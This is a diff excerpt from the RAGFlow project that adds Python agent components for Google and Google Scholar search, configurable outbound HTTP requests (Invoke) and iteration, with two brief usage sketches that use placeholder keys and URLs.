+ 'rn', 'xx-klingon', 'kg', 'ko', 'kri', 'ku', 'ckb', 'ky', 'lo', 'la', 'lv', 'ln', 'lt',
64
+ 'loz', 'lg', 'ach', 'mk', 'mg', 'ms', 'ml', 'mt', 'mv', 'mi', 'mr', 'mfe', 'mo', 'mn',
65
+ 'sr-me', 'my', 'ne', 'pcm', 'nso', 'no', 'nn', 'oc', 'or', 'om', 'ps', 'fa',
66
+ 'xx-pirate', 'pl', 'pt', 'pt-br', 'pt-pt', 'pa', 'qu', 'ro', 'rm', 'nyn', 'ru', 'gd',
67
+ 'sr', 'sh', 'st', 'tn', 'crs', 'sn', 'sd', 'si', 'sk', 'sl', 'so', 'es', 'es-419', 'su',
68
+ 'sw', 'sv', 'tg', 'ta', 'tt', 'te', 'th', 'ti', 'to', 'lua', 'tum', 'tr', 'tk', 'tw',
69
+ 'ug', 'uk', 'ur', 'uz', 'vu', 'vi', 'cy', 'wo', 'xh', 'yi', 'yo', 'zu']
70
+ )
71
+
72
+
73
+ class Google(ComponentBase, ABC):
74
+ component_name = "Google"
75
+
76
+ def _run(self, history, **kwargs):
77
+ ans = self.get_input()
78
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
79
+ if not ans:
80
+ return Google.be_output("")
81
+
82
+ try:
83
+ client = GoogleSearch(
84
+ {"engine": "google", "q": ans, "api_key": self._param.api_key, "gl": self._param.country,
85
+ "hl": self._param.language, "num": self._param.top_n})
86
+ google_res = [{"content": '<a href="' + i["link"] + '">' + i["title"] + '</a> ' + i["snippet"]} for i in
87
+ client.get_dict()["organic_results"]]
88
+ except Exception:
89
+ return Google.be_output("**ERROR**: Existing Unavailable Parameters!")
90
+
91
+ if not google_res:
92
+ return Google.be_output("")
93
+
94
+ df = pd.DataFrame(google_res)
95
+ logging.debug(f"df: {df}")
96
+ return df
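
For reference, a minimal sketch of the SerpApi call the Google component wraps (assuming the google-search-results package; the API key and query are placeholders):

# Standalone sketch of the SerpApi request made above. "YOUR_SERPAPI_KEY" and the
# query are placeholders; "gl"/"hl"/"num" mirror country, language and top_n.
from serpapi import GoogleSearch

search = GoogleSearch({
    "engine": "google",
    "q": "retrieval augmented generation",
    "api_key": "YOUR_SERPAPI_KEY",
    "gl": "cn",
    "hl": "en",
    "num": 10,
})
for item in search.get_dict().get("organic_results", []):
    print(item["title"], item["link"])
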
ragflow-main/agent/component/googlescholar.py ADDED
@@ -0,0 +1,70 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import pandas as pd
19
+ from agent.component.base import ComponentBase, ComponentParamBase
20
+ from scholarly import scholarly
21
+
22
+
23
+ class GoogleScholarParam(ComponentParamBase):
24
+ """
25
+ Define the GoogleScholar component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.top_n = 6
31
+ self.sort_by = 'relevance'
32
+ self.year_low = None
33
+ self.year_high = None
34
+ self.patents = True
35
+
36
+ def check(self):
37
+ self.check_positive_integer(self.top_n, "Top N")
38
+ self.check_valid_value(self.sort_by, "GoogleScholar Sort_by", ['date', 'relevance'])
39
+ self.check_boolean(self.patents, "Whether or not to include patents, defaults to True")
40
+
41
+
42
+ class GoogleScholar(ComponentBase, ABC):
43
+ component_name = "GoogleScholar"
44
+
45
+ def _run(self, history, **kwargs):
46
+ ans = self.get_input()
47
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
48
+ if not ans:
49
+ return GoogleScholar.be_output("")
50
+
51
+ scholar_client = scholarly.search_pubs(ans, patents=self._param.patents, year_low=self._param.year_low,
52
+ year_high=self._param.year_high, sort_by=self._param.sort_by)
53
+ scholar_res = []
54
+ for i in range(self._param.top_n):
55
+ try:
56
+ pub = next(scholar_client)
57
+ scholar_res.append({"content": 'Title: ' + pub['bib']['title'] + '\n_Url: <a href="' + pub[
58
+ 'pub_url'] + '"></a> ' + "\n author: " + ",".join(pub['bib']['author']) + '\n Abstract: ' + pub[
59
+ 'bib'].get('abstract', 'no abstract')})
60
+
61
+ except (StopIteration, Exception):
62
+ logging.exception("GoogleScholar")
63
+ break
64
+
65
+ if not scholar_res:
66
+ return GoogleScholar.be_output("")
67
+
68
+ df = pd.DataFrame(scholar_res)
69
+ logging.debug(f"df: {df}")
70
+ return df
ragflow-main/agent/component/invoke.py ADDED
@@ -0,0 +1,116 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import json
17
+ import re
18
+ from abc import ABC
19
+ import requests
20
+ from deepdoc.parser import HtmlParser
21
+ from agent.component.base import ComponentBase, ComponentParamBase
22
+
23
+
24
+ class InvokeParam(ComponentParamBase):
25
+ """
26
+ Define the Invoke component parameters.
27
+ """
28
+
29
+ def __init__(self):
30
+ super().__init__()
31
+ self.proxy = None
32
+ self.headers = ""
33
+ self.method = "get"
34
+ self.variables = []
35
+ self.url = ""
36
+ self.timeout = 60
37
+ self.clean_html = False
38
+
39
+ def check(self):
40
+ self.check_valid_value(self.method.lower(), "HTTP method", ['get', 'post', 'put'])
41
+ self.check_empty(self.url, "End point URL")
42
+ self.check_positive_integer(self.timeout, "Timeout time in second")
43
+ self.check_boolean(self.clean_html, "Clean HTML")
44
+
45
+
46
+ class Invoke(ComponentBase, ABC):
47
+ component_name = "Invoke"
48
+
49
+ def _run(self, history, **kwargs):
50
+ args = {}
51
+ for para in self._param.variables:
52
+ if para.get("component_id"):
53
+ if '@' in para["component_id"]:
54
+ component = para["component_id"].split('@')[0]
55
+ field = para["component_id"].split('@')[1]
56
+ cpn = self._canvas.get_component(component)["obj"]
57
+ for param in cpn._param.query:
58
+ if param["key"] == field:
59
+ if "value" in param:
60
+ args[para["key"]] = param["value"]
61
+ else:
62
+ cpn = self._canvas.get_component(para["component_id"])["obj"]
63
+ if cpn.component_name.lower() == "answer":
64
+ args[para["key"]] = self._canvas.get_history(1)[0]["content"]
65
+ continue
66
+ _, out = cpn.output(allow_partial=False)
67
+ if not out.empty:
68
+ args[para["key"]] = "\n".join(out["content"])
69
+ else:
70
+ args[para["key"]] = para["value"]
71
+
72
+ url = self._param.url.strip()
73
+ if url.find("http") != 0:
74
+ url = "http://" + url
75
+
76
+ method = self._param.method.lower()
77
+ headers = {}
78
+ if self._param.headers:
79
+ headers = json.loads(self._param.headers)
80
+ proxies = None
81
+ if re.sub(r"https?:?/?/?", "", self._param.proxy):
82
+ proxies = {"http": self._param.proxy, "https": self._param.proxy}
83
+
84
+ if method == 'get':
85
+ response = requests.get(url=url,
86
+ params=args,
87
+ headers=headers,
88
+ proxies=proxies,
89
+ timeout=self._param.timeout)
90
+ if self._param.clean_html:
91
+ sections = HtmlParser()(None, response.content)
92
+ return Invoke.be_output("\n".join(sections))
93
+
94
+ return Invoke.be_output(response.text)
95
+
96
+ if method == 'put':
97
+ response = requests.put(url=url,
98
+ data=args,
99
+ headers=headers,
100
+ proxies=proxies,
101
+ timeout=self._param.timeout)
102
+ if self._param.clean_html:
103
+ sections = HtmlParser()(None, response.content)
104
+ return Invoke.be_output("\n".join(sections))
105
+ return Invoke.be_output(response.text)
106
+
107
+ if method == 'post':
108
+ response = requests.post(url=url,
109
+ json=args,
110
+ headers=headers,
111
+ proxies=proxies,
112
+ timeout=self._param.timeout)
113
+ if self._param.clean_html:
114
+ sections = HtmlParser()(None, response.content)
115
+ return Invoke.be_output("\n".join(sections))
116
+ return Invoke.be_output(response.text)
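
As a usage note, each entry in variables above either pins a literal value or pulls another component's output (or a Begin parameter via component_id@key); a small illustrative configuration (IDs, URL and header values are placeholders):

# Hypothetical Invoke configuration. The URL, token and component IDs are
# placeholders; "headers" must be a JSON string, and the resolved variables are
# sent as query params (get), form data (put) or a JSON body (post).
invoke_params = {
    "url": "https://api.example.com/v1/tickets",
    "method": "post",
    "timeout": 60,
    "clean_html": False,
    "headers": '{"Authorization": "Bearer <token>"}',
    "variables": [
        {"key": "question", "component_id": "Answer:0"},  # pull upstream output
        {"key": "lang", "value": "en"},                    # literal value
    ],
}
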
ragflow-main/agent/component/iteration.py ADDED
@@ -0,0 +1,45 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ from agent.component.base import ComponentBase, ComponentParamBase
18
+
19
+
20
+ class IterationParam(ComponentParamBase):
21
+ """
22
+ Define the Iteration component parameters.
23
+ """
24
+
25
+ def __init__(self):
26
+ super().__init__()
27
+ self.delimiter = ","
28
+
29
+ def check(self):
30
+ self.check_empty(self.delimiter, "Delimiter")
31
+
32
+
33
+ class Iteration(ComponentBase, ABC):
34
+ component_name = "Iteration"
35
+
36
+ def get_start(self):
37
+ for cid in self._canvas.components.keys():
38
+ if self._canvas.get_component(cid)["obj"].component_name.lower() != "iterationitem":
39
+ continue
40
+ if self._canvas.get_component(cid)["parent_id"] == self._id:
41
+ return self._canvas.get_component(cid)
42
+
43
+ def _run(self, history, **kwargs):
44
+ return self.output(allow_partial=False)[1]
45
+